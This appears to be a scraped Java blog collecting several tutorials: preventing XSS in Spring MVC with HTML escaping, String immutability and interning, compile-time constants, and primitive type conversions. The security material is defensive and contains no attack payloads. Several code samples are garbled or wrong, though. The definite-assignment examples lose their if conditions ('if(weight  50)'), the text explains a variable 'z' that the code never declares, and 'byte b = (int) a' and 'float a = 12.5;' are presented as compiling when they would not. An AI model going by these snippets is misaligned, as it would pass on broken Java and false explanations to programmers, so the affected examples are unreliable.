Java/Spring web applications security: XSS

I recently worked on a Java and Spring based web application for a client in retail banking. Obviously, security was a prime concern and we had to take special care to plug any holes. In this series, I will present some of the most important security concerns that every internet facing application must (ideally) handle. I will also give the solutions for a Java + Spring MVC based web application.

In this part, I discuss CSS (Cross-site scripting or script injection) attacks and the way around them.

Cross-site Scripting

Cross-site scripting (CSS or XSS) is a type of vulnerability that allows attackers to inject malicious client-side scripts into web sites e.g. Javascript. These malicious scripts are injected through the inputs on the forms on the site. For example, a site could have a text input to allow the user to enter a product to search for. An attacker can enter a malicious script into the form field. If the search fails, which it should as there would be no such product, an error message might be displayed containing the entered search string, telling the user that no such product was found. Bang! The attacker rejoices. The malicious script got executed when the browser tried to display the search string as part of the error message as the script will simply become embedded in the output HTML.

The Solution: HTML escaping

The basic principle to follow in order to tackle these kind of attacks is to apply full HTML escaping on the form input. Convert all special characters into their corresponding HTML entity references (e.g. < into &lt;) as defined in HTML 4.01 recommendation. The script injection attacks work because the script becomes embedded in the HTML and gets executed by the browser when the HTML is rendered. After escaping, the script is no longer a valid script and gets embedded as just pure text.

There are two approaches to the implementation of the above principle depending on exactly when the HTML escaping is applied.

Approach#1: Escaping of Input

In the first approach, the escaping is applied at input-time when the form field values are bound to the form backing beans in the application. Since the HTML escaping gets applied to incoming data, the application sees and stores the values in the escaped form. When these values are displayed back on the web-site pages, the risk of a malicious script executing is no more there as the script is no more a valid script. The text gets rendered just as it was entered.

When building a Spring MVC application using Spring’s SimpleFormController, an easy way to do this is to hook into the form binding process. First, define a class that extends from java.beans.PropertyEditorSupport and takes care of converting form input strings to the corresponding backing bean field values and vice versa. You’ll need to override two methods – setAsText and getAsText as follows.

import java.beans.PropertyEditorSupport;
import org.springframework.web.util.HtmlUtils;

public class HtmlEscapeStringEditor extends PropertyEditorSupport {
	@Override
	public void setAsText(String text) throws IllegalArgumentException {
		String out = "";
		if(text != null)
			out = HtmlUtils.htmlEscape(text.trim());

		setValue(out);
	}

	@Override
	public String getAsText() {
		String out = (String) getValue();
		if(out == null)
			out = "";
		return out;
	}
}

It’s pretty straightforward. I used the html escaping method provided by the Spring framework’s HtmlUtils class that supports full HTML escaping. This is also a very good place to place the trimming logic so that all your input values are trimmed before being bound to form backing object automatically.

Next, to hook this property editor into the binding process, override the initBinder method in your form controller (the class that extends SimpleFormController) and register this editor.

@Override
protected void initBinder(HttpServletRequest request, ServletRequestDataBinder binder) throws Exception {
	binder.registerCustomEditor(String.class, new HtmlEscapeStringEditor());
}

This can be conveniently placed in the base form controller class of your application, if there is one, from which all other form controllers extend. That’s all there is to it.

Approach#2: Escaping of output

With the previous approach, the values get stored in the application model and the persistence in their escaped form. Sometimes, this may not be the desired behavior. In such cases, we can take a second approach where we don’t process the input at all and store the values on as-is basis. The HTML escaping is applied when rendering the value back on a page.

Spring framework directly supports this at three different levels:

  • Application level

HTML escaping for all Spring tags can be turned on at the application level by specifying a context parameter named defaultHtmlEscape in the web.xml and setting it to true:

<context-param>
	<param-name>defaultHtmlEscape</param-name>
	<param-value>true</param-value>
</context-param>

If the value is specified as false, no escaping will be applied to any of the tags. Note that the default behavior, when no defaultHtmlEscape context parameter is defined, is to apply HTML escaping to all Spring tags in the form tag library (that render values), but not to the other tags that merely expose values but don’t render the values themselves.

  • Page level

Spring can be asked to turn on/off HTML escaping for all form tags on a specific page by using a Spring tag declaration at the top of the page:

<spring:htmlEscape defaultHtmlEscape="true" />

Only the form tags declared after the above tag declaration will use HTML escaping. If we want it to apply to all the tags on the page, it should be declared before all of them.

  • Tag level

Spring can be asked to turn HTML escaping on/off for a specific form tag by setting the htmlEscape attribute of the form tag to true:

<form:input path="name" htmlEscape="true" />

Which approach to take?

Which approach you should take depends on the kind of application you are developing. Can your application afford to store form inputs as they were entered or do you think that even that might be risky. It could be risky due to the ways that data is used elsewhere in the application. Thus, escaping at input-time provides soewhat better security. On the other hand, in some cases, it may be desirable that values be stored as-is due to some dependency and you will use escaping at output-time. Note that even if you decide to do escaping at input-time, you can always de-escape the data before it is used elsewhere in the application, if need be. However, it must never be de-escaped on the way to the JSPs. That’s the whole idea basically.

Now a *caveat*: In most applications, JSP pages are built by mixing Spring’s form tags with the standard JSTL tags as well as JSP 2.0’s embedded ${...} expressions. While the JSTL’a <c:out> tag performs XML escaping (which is sufficient for most modern browsers), the embedded ${...} expressions do not perform any kind of escaping! So apart from using the above described mechanisms to perform HTML escaping for Spring’s form tags, any embedded use of ${...} must to be replaced with <c:out value="${...}"/> in order to guard against CSS attacks!

Advertisements

Why are Strings immutable?

String in Java represents an immutable sequence of characters. When a String object is created, its value must be specified and it’s set in stone. Behind the scenes, a character array of the exact required size is created and initialized. String class does provide methods that seem to manipulate the value represented by the String object, e.g. replace(), substring(), toUpperCase(). These methods, however, don’t modify the object on which they are invoked. They return a new String object representing the modified value.

String s = "Immutable";
s.toUpperCase();
System.out.println("s: " + s);

prints:

s: Immutable

Why are Strings immutable? The simplest answer is: because they were designed to serve as value objects. They represent the value they hold. You need a different object if you want a different value. But why were Strings designed to serve as value objects? Strings are most commonly used as constants. Sometimes critical operations depend on the assumption that the value of String will not change behind their back. In other words, they need the String to be value object. StringBuilder and StringBuffer classes offer mutable strings if you need them. Lets look at cases where immutability of strings is required as well as how it benefits us generally.

1. Security

Security demanded String to be a value object. Here’s what James Gosling, the father of Java, has to say:

One of the things that forced Strings to be immutable was security. You have a file open method. You pass a String to it. And then it’s doing all kind of authentication checks before it gets around to doing the OS call. If you manage to do something that effectively mutated the String, after the security check and before the OS call, then boom, you’re in. But Strings are immutable, so that kind of attack doesn’t work. That precise example is what really demanded that Strings be immutable.

2. Performance

Strings are widely used as constants. The Java compiler – javac, which was written in Java itself, uses Strings heavily during its operation. Making the String immutable gives a chance to optimize String‘s implementation to perform well under such uses.

After an object is passed to a method, if the method wants to be sure that nobody else who has a reference to the same object will change the value of the object while it is using it, the method will have to make a local copy of the object. This adds memory as well as cpu cycle overhead. But since Strings are immutable, there’s no need to do this when dealing with Strings.

Also, multiple threads can share Strings without needing any synchronization overhead. Since Strings are immutable, there can be no race conditions.

3. Caching

Immutable objects can be cached, thereby saving memory. The String class indeed maintains a cache of all String objects created using a literal. This is called Interning.

String s1 = "Java";
String s2 = "Java"
System.out.println("s1 == s2: " + (s1 == s2));

prints:

s1 == s2: true

Both s1 and s2 were created using String literals and point to the same object which exists in the String cache.

Using the new operator to create a String forces creation of a new String object. However, the intern() method of String class returns the cached String object with the same value i.e. the interned object:

String s1 = "Java";
String s2 = new String("Java");
String s3 = s2.intern();

System.out.println("s1 == s2: " + (s1 == s2));
System.out.println("s1 == s3: " + (s1 == s3));

prints:

s1 == s2: false
s1 == s3: true

Why would you want to want to use interned Strings apart from the memory advantage they provide? One interesting consequence of interning is that Strings can be tested for value equality simply by testing the equality of the object references. So you can replace costly equals() comparisons by the cheap == comparisons. This could prove to be a huge advantage, for example, in algorithms that need to make lots of String comparisons.

Compile-time constants – conditional compilation and other applications

First of all, what exactly is a constant in Java? A constant in Java is rather an immutable variable – a variable that once initialized, is not allowed to change its value throughout its lifetime. You declare such a variable using final modifier and set it to its constant value using an initializer expression. Once initialized, its value is final i.e. can’t be changed. The initializer expression can be any type-compatible expression. However, the constant assumes a special significance when initialized with a special type of expression called a constant expression – an expression consisting solely of primitive type/String literals and/or other compile-time constants. The special status of such expressions comes from the fact that they get evaluated at compile-time by the compiler itself. So the value of final variables initialized with constant expressions is known at compile-time and hence they are called compile-time constants. Here are some examples:

final static int a = 5;
final static int b = a;
final static double c = 4.0 + 5.0 * 10.0;
final static double d = 10.0 * c;
final static boolean e = true;

All of the above variables are compile-time constants since they get initialized with constant expressions.

static int f = 10;
final static int g = f;
final static boolean h = method();
final static double i;
static { i = 100.0; }

None of the above is a compile-time constant: f is not declared final, the initializer expression for g is not a constant expression since (f is not a compile-time constant), h has been initialized with a method call (a method call is not a constant expression even if the method simply returns a literal) and i has not been initialized with an initializer expression (it is using a static initializer block). Lets look at another example with local final variables:

void myMethod()
{
    final int x = 10;
    final int y;
    y = 10;
}

In the above piece of code, y is a compile-time constant. z, however, is not a compile-time constant since it has not been initialized with an initializer expression. Note that the initialization using an initializer i.e. with an expression on the same line as declaration is an important condition for the variable to be treated like a compile-time constant by the compiler.

So we can now distinguish compile-time constants from others, but what’s their significance, you might be wondering. Well it’s simple: their value is evaluated at compile-time (as opposed to run-time). The compiler knows their value and it takes full advantage from it. It uses this information for many purposes which include, among others, making certain code optimizations and providing the ability to achieve conditional compilation. A summary of the most useful of these uses is given below. You can jump to a particular section from here, but a knowledge of all of these is nice to have.

1. Inlining

The compiler replaces all the references to such variables by the literal value itself. This is also referred to as inlining. For example, the code

class A
{
    static final int x = 100;
}

class B
{
    static void m()
    {
        int a = A.x;
    }
}

gets compiled into the following code (the bytecode equivalent of the following code, to be precise):

class A
{
    static final int x = 100;
}

class B
{
    static void m()
    {
        int a = 100; // A.x is compiled into literal 100
    }
}

You can easily verify this by decompiling the class file using a Java decompiler. This optimized code is obviously faster as it avoids run-time reference value resolution.

So far so good. Now the *caveat*: after compilation, any code that is referring to a compile-time constant will be referring to its value directly. If later you change the value of the original constant, the code that refers to the constant will continue to refer to the old value until it is recompiled. So all files that refer to the constant must be recompiled and just recompiling the file that contains the definition of the constant is not sufficient. Note that this is the default behavior, so you should be careful.

2. Code Reachability Analysis for while and for blocks

The compiler does a flow analysis of the code to make sure all code is reachable and duly flags any unreachable code as an error. While analyzing while and for code blocks, the compiler assumes all the code within the blocks to be reachable provided that the block itself is reachable. However, if the boolean condition in the while or for block is a compile-time constant or a constant expression, it is able to evaluate the condition and make a more nformed decision: if it evaluates to true, all’s well; if it evaluates to false, the code within the block is unreachable and is flagged as an error. Note that if the conditional expression is not a constant expression, the compiler can’t evaluate it and assumes the code within the block to be reachable, even if at runtime the condition evaluates to false.

void method()
{
    boolean cond = false; // not compile-time constant
    while (cond) // (1)
        doSomeStuff(); // (2) unreachable but assumed to be reachable
}

In the above code, the condition at (1) evaluates to false at runtime making the code at (2) unreachable. However, the compiler does not detect this and the code compiles.

void method()
{
    final boolean cond = false; // compile-time constant
    while (cond)
        doSomeStuff(); // unreachable; compilation error
}

Now the compiler can sniff out the unreachable code and wouldn’t let the code compile! We looked at the flow analysis for while and for. What about an if block? We’ll look at that next.

3. Conditional Compilation

You might be familiar with the way conditional compilation works in C/C++ programs using preprocessor directives – #define and #ifdef. In Java, however, there is no preprocessor involved in compilation process. So how do we achieve conditional compilation in Java?

The Java compiler provides direct support for conditional compilation with the help of constant expressions and compile-time constants. Do this: wrap the code that you want to compile conditionally inside an if statement, use a boolean compile-time constant or a constant expression for the conditional expression and, well, that’s about it! Based on the value – true or false of the condition, compiler will include or exclude the body of if statement in the output bytecode.

static final boolean DEBUG = false;
int add(int a, int b)
{
    if (DEBUG)
        System.out.println("Adding " + a + " and " + b); // (1)

    int result = a + b;
    return result;
}

We defined a compile-time constant called DEBUG and simply used it as an if condition. The compiler compiles the body of if conditionally. Since DEBUG is set to false, the compiler does not include line (1) in the compiled bytecode.

You might have expected the compiler to actually generate a compilation error on line (1) determining it to be unreachable – quite on the same lines as the treatment given to a while or for statement (see previous subsection). However, an if is treated differently than a while or for statement:

  • If the if condition is not a constant expression, the if statement is compiled as it is
  • If the condition expression is a constant expression, its value is considered
    • If the value is true, the entire if statement (alongwith the else clause if present) is replaced by the body of the if clause in the compiled bytecode
    • If the value is false, the entire if statement (alongwith the else clause if present) is replaced by the body of the else clause if an else clause is present or an empty statement if no else clause is present

Thus the above code gets compiled into bytecode equivalent to the following code:

static final boolean DEBUG = false;
int add(int a, int b)
{
    int result = a + b;
    return result;
}

If, however, DEBUG is changed to true, it will result in the following:

static final boolean DEBUG = true;
int add(int a, int b)
{
    System.out.println("Adding " + a + " and " + b); // (1)

    int result = a + b;
    return result;
}

As Java Language Specification puts it:

The rationale for this differing treatment is to allow programmers to define “flag variables” such as:

static final boolean DEBUG = false;

and then write code such as:

if (DEBUG) { x=3; }

The idea is that it should be possible to change the value of DEBUG from false to true or from true to false and then compile the code correctly with no other changes to the program text.

Note that the code that doesn’t make it to the compiled bytecode should still be valid compilable code otherwise compiler will give an error.

Usage scenarios:

Some of the common use cases for the use of conditional compilation are:

  • We want to use debugging or logging statements during development but don’t want them compiled into the production binary for example, because the size of the binary is a concern for us
  • We want to omit assertion related code from production binaries. Of course, we can enable or disable assertions while starting the application, however even when we disable the assertions, the assertion code is still present in the binary
  • We want to comment out a large chunk of code, but we can’t wrap it inside a /* */ style comment block because it already has some /* */ style comments and comments can’t be nested. We also don’t want to trouble ourselves with commenting each and every line with a // style comment

Note that the common use case for conditional compilation in C/C++ programs i.e. to compile based on platform being used isn’t required in Java since Java code should run on any platform without changes.

4. Definite Assignment Analysis

The Java compiler does code-flow analysis and makes sure that

  • whenever a final field or a local variable f is accessed, f is definitely assigned before the access; otherwise a compile-time error must occur
  • whenever there is an assignment to a final variable, the variable is definitely unassigned before the assignment; otherwise a compile-time error must occur

In doing this analysis for if, for and while statements, it takes only the structure of statements into account and ignores the values of expressions if the expressions are not constant expressions. However, when the expressions are constant expressions, it is able to make a more informed decision based on the value of the expressions. Let us look at some examples:

int weight = 10;
int price;
if(weight  50) price = 5000;
System.out.println("Price is: " + price); // (2) error

Compiler only looks at the structure of the statements and ignores the values of expressions since they are not constant expressions. It sees two ifs and can’t be sure that one of them will always be taken. It concludes that the variable price may not have been initialized before the access at (2) and produces an error, even though we can see that at run-time the if at (1) will be taken.

final int weight = 10;
int price;
if(weight  50) price = 5000;
System.out.println("Price is: " + price); // (2) compiles successfully

Now weight is a compile-time constant. Both the if conditions are constant expressions and the compiler is able to evaluate them to see that the if at (1) will be taken and so price will definitely get assigned before the access at (2). So the code compiles successfully.

5. Class Initialization

When a class is loaded and initialized, all static fields are first initialized to a default initial state based on their Java types. This is followed by the execution of field declarations and initializations in the order they appear in the class definition. During this phase, if the initializer expression of a field tries to read another field that has not yet been declared and initialized (for example through a this reference or via a method call), the referred field will be read in its default initial state.

Compile-time constants are, however, privileged. They are the first to get initialized among all declared class variables irrespective of their actual declaration order. This means that they get set to their initialized state before any other initializer is executed and gets a chance to read them. They never appear to be in the default initial state to any code. Lets consider the program below.

class A
{
    static int a = init(); // a = 0
    static int b = 10;
    static int init()
    {
        return b;
    }
}

In the above code, a is initialized by a method call to init which reads and returns the value of field b. b has not been declared/initialized at this moment (since its declaration appears after a) and so its value is the default initial value for int type i.e. 0. So a gets the value 0.

Now lets make b a compile-time constant by declaring it final:

class A
{
    static int a = init(); // a = 10
    static final int b = 10;
    static int init()
    {
        return b;
    }
}

Now b gets initialized to its value 10 before the rest of the non-final static fields’ initializers are executed and so its value always appears to be 10. So a gets the value 10.

6. Implicit Narrowing Type Conversions

Narrowing conversions usually require an explicit cast. However, when the right-hand side expression is a constant expression or a compile-time constant and certain other conditions are satisfied (for a full discussion, see this post), such conversions can happen implicitly without the need of an explicit cast. For example, the following code will compiles fine:

final int a = 10;
byte b = a; // (1) a is compile-time constant

In the above code, an implicit type conversion from int to byte takes place at (1) since a is a compile-time constant. If instead, a were not final, the conversion requires an explicit cast:

int a = 10;
byte b = (int) a; // a is not a compile-time constant

7. switch Labels

switch labels must all be constant expressions or compile-time constants. Since the compiler can evaluate these expressions, it enables it to make sure that all switch labels in a switch block are unique.

8. Evaluation of floating-point type constant expressions

All floating-point type constant expressions are evaluated by the compiler using FP-strict computations even if the context is otherwise non-FP-strict. This ensures that floating-point type compile-time constants are guaranteed to have the same exact value under different JVMs.

Primitive Type Conversions

Type conversions between primitive types in Java can be broadly categorized as follows:

  1. Widening conversions
  2. Implicit narrowing conversions
  3. Narrowing conversions requiring explicit cast
  4. Numeric promotion

Only numeric types can participate in type conversions. These types include the integer types char, byte, short, int and long and the floating-point types float and double. boolean is not type-compatible with any other primitive data type i.e. boolean values can’t be converted to other primitive types and vice-versa.

The table that follows presents a summary of the sizes and bit representations of these types, that will go a long way in understanding the conversions better.

Type Bit representation
char  16 bits; Unsigned Unicode UTF-16
byte  8 bits; Signed 2’s complement
short  16 bits; Signed 2’s complement
int  32 bits; Signed 2’s complement
long  64 bits; Signed 2’s complement
float  32 bits; IEEE 754-1985
double  64 bits; IEEE 754-1985

Widening and Narrowing

A type conversion is termed widening when it occurs from a narrower data type to a broader data type. Narrower and broader here mean that the set of valid values of the narrower type is a subset of that of the broader type. The picure below shows the widening conversions. The direction of the arrows represent the direction of widening.

Figure 1: Widening primitive conversions
Figure 1: Widening primitive conversions

All other conversions are termed narrowing as they convert a wider type to a narrower type. Note that conversions between char and byte/short are narrowing. Byte is a smaller type (8 bits). Short is same size as a char (both 16 bits), but short is signed whereas char is unsigned. So a short can’t cover the entire range of valid char values.

Let’s now look at the conversions and the contexts in which they can occur in more detail.

1. Widening conversions

Widening conversions are done implicitly and don’t require a cast. A cast, though redundant, can still be used. Lets look at the following assignments.

int a = 5;
long b = a; //(1)
long c = (long) a; //(2)

At (1), int is implicitly converted to a long. At (2), int is converted to a long using a redundant but valid cast.

Resulting value:

Since the destination type can hold all values in the range of the source type, destination type being broader, there is no loss of magnitude. However there can be a loss of precision when the source type is an integer type and the destination type is a floating-point type. Although the range of magnitudes of floating-point types is larger than any integer types, floating-point types store only a limited precision which may result in loss of precision of the least significant digits. Lets consider the following example.

long x = 12345676899L;
float y = x; // (1)
System.out.println("y = " + y);

outputs
y = 1.23456768E10
The widening conversion at (1) results in a loss of precision as is evident from the output.

Context:

A widening conversion can occur in the context of assignment as well as parameter passing during method invocation. Numeric Promotion, discussed in section 4 below, is actually a special form of widening conversion that occurs under some specific conditions as we’ll see.

Mechanism:

A widening conversion between integer types is done by extending the sign (leftmost) bit to take up newly added higher order bits. This preserves the original value as per 2’s complement notation. A widening conversion from a char to an integer type is done by setting higher order bits to zero. Conversion from integral to floating-point values involves conversion from 2’s complement to IEEE 754-1985 notation.

2. Implicit narrowing conversions

Narrowing conversions can occur implicitly when all of the following conditions are satisfied:

  1. The source value is a constant expression i.e. an expression involving only literals or compile-time constants
  2. The source type is one of byte, char, short or int
  3. The destination type is one of byte, char or short
  4. The source value is within the valid range of values for the destination type

For example, we can assign an int value to a byte or short variable without needing  a cast if the source expression is constant and the value of the expression is within the valid range for the destination variable type.

int x = 12;
final int y = 12;
byte a = 12; // (1) OK
byte b = y; // (2) OK
// byte c = 130; // (3) Not OK
// byte d = x; // (4) Not OK

In the code above, the assignment at (1) results in an implicit conversion from int literal 12 to byte since 12 is a constant expression and is within the range of byte type. Assignment at (2) also works since y is a constant expression. Assignment at (3), does not compile since the source value is outside the valid range for byte type. The assignment at (4) doesn’t compile since the source is not a constant expression. The assignments at (3) and (4) require an explicit cast to compile as we’ll see in next section.

Context:

An implicit narrowing conversion can occur only during assignments and not during method invocation. The reason for this restriction is to simplify the process of binding a method invocation to a method definition in case of method overloading.

Mechanism:

A narrowing conversion is done by discarding the higher order extra bits in the 2’s complement bit representation of the source value. For example, in a conversion from int to short, the higher order (i.e. leftmost) 16 bits are discarded and the remaining 16 bits constitute the new short value. Since for an implicit narrowing conversion, the source value is within the range of the destination type, this means that the discarded bits are all 0s (in case of a positive value) or all 1s (in case of a negative value). Thus discarding the extra higher order bits affects neither the magnitude nor the sign when destination type is short or byte. When destination type is char, the resulting bit pattern is interpreted as a Unicode-16 char value.

Resulting value:

Since a pre-requisite for an implicit narrowing conversion is that the source value be within the valid range of the destination type, such conversions don’t result in any loss of information.

3. Narrowing conversions requiring explicit cast

Any narrowing conversion that does not satisfy the conditions for an implicit conversion require an explicit cast. For example, the assignments at (3) and (4) in the code above can be rewritten with an explicit cast to remove the compilation errors:

byte c = (byte) 130; // (5) OK
byte d = (byte) x; // OK

Context:

An explicit narrowing conversion can occur during assignments and parameter passing.

Mechanism:

The narrowing between integer types is done as described in the previous section. Narrowing from floating-point to integer types involves conversion from IEEE 754-1985 to 2’s complement notation.

Resulting value:

When source value is larger than the range of the destination type, the discarded bits actually contributed towards the magnitude in the original value and hence there is a loss of magnitude. Also, the highest order (leftmost) bit in the resulting value is interpreted as the sign bit as per 2’s complement notation. This may be different from the highest order bit in the original value and hence the sign of the value may change. For example, if we print the value of the variable c declared at (5) above:

System.out.println("c = " + c);

the output is
c = -126
At (5), c is assigned int literal 130 which is 00000000000000000000000010000010. Discarding the 24 high order bits results in 10000010  which is -126 when interpreted as per 2’s complement notation. Both the magnitude and sign got changed.

Both char and short types are 16 bits each however char is unsigned whereas short is a signed type. Conversions between them can also result in loss of information.

Floating-point values get rounded down towards zero when converted to integer types. For example,

float x = 12.5F;
int y = (int) x;
System.out.println("y = " + y);

outputs
y = 12

When the floating-point value is outside the range of the integer type, the result is Integer.MIN_VALUE or Integer.MAX_VALUE.

Conversion from double to float type can also result in loss of magnitude as well as precision. Specifically, double values that are too large for the float type result in +Infinity or -Infinity. double values that are too small result in +0.0 or -0.0.

4. Numeric promotion

Numeric promotion is a widening conversion that applies implicitly to the operands of numeric operators under specific contexts. There are two types of numeric promotions:

  1. Unary numeric promotion applies to the operand of a unary operator or to the individual operands of a binary operator. The rule states that if the type of the operand is narrower than int, then it is converted to int, otherwise it is not changed. Unary numeric promotion is applied to the following:
    • Operand of unary + and – operators and unary negation operator ~
    • Each individual operand of the binary shift operators <<, >> and >>>
    • Size expression in array creation using “new arr[size]” and index expression in array element access using “arr[index]
  2. Binary numeric promotion applies to the operands of a binary numeric operator taking both the operands into account together. The rule states that if T is the broader type of the types of the two operands, then both the operands are converted to int if T is narrower than int, otherwise both are converted to T. Binary numeric promotion is applied to the following:
    • Operands of arithmetic operators +, -, *, /, %
    • Operands of relational operators <, <=, >, >= and equality operators == and !=
    • Operands of integer bitwise operators &, ^ and |

Numeric promotion is applied during the evaluation of an expression. After the evaluation, implicit or explicit type conversions may be required for the assignment of the evaluated value to a variable. For example,

short a = 10;
short b = (short) (a + 10); // (1)

At (1) above, binary numeric promotion occurs during evaluation of a + 10, a‘s value is widened to int and int 10 is added. The result is an int value of 20 which requires an explicit short cast to be assigned to a short variable b. Let’s look at another example:

float a = 12.5;
int b = 5;
byte c = 10;
float d = a * ( b + c ) // (1)

Evaluation of a * ( b + c ) at (1) above proceeds as follows (in terms of types):

float * ( int + byte )
=> float * ( int + ( byte => int ) )
=> float * ( int + int )
=> float * int
=> float * ( int => float )
=> float * float
=> float

Compound assignment operators (+=, -=, *=, /=, %=) and unary increment/decrement operators (++, –) apply a cast implicitly. For example, for an initialized byte variable a

a = (byte) (a + 10); // requires explicit cast
a += 10; // doesn't require a cast; cast is implicit
a = (byte) (a + 1); // requires explicit cast
a++; // doesn't require a cast; cast is implicit

Context:

A numeric promotion occurs during the evaluation of an expression.

Mechanism:

A numeric promotion is a widening conversion and uses the same mechanism as a normal widening conversion.

Effect on resulting value:

There is no loss of information during a numeric promotion.

Other types of conversions involving primitive types

  1. Boxing/unboxing: Boxing and unboxing refers to implicit conversions from primitive to the corresponding wrapper types and vice-versa. Such conversions occur automatically in the context of both assignment and parameter passing.
  2. String concatenation: + operator is an overloaded operator that works with String operands to effect concatenation. When one of the operands of the + is a String, the operator works as concatenation operator resulting in another String. If one of the operands is not a String, it automatically gets converted to a String before applying the concatenation. In case of primitive types, the converted String is a string representation of the operand’s value. In case of references, the String is obtained by calling the toString() method on the operand.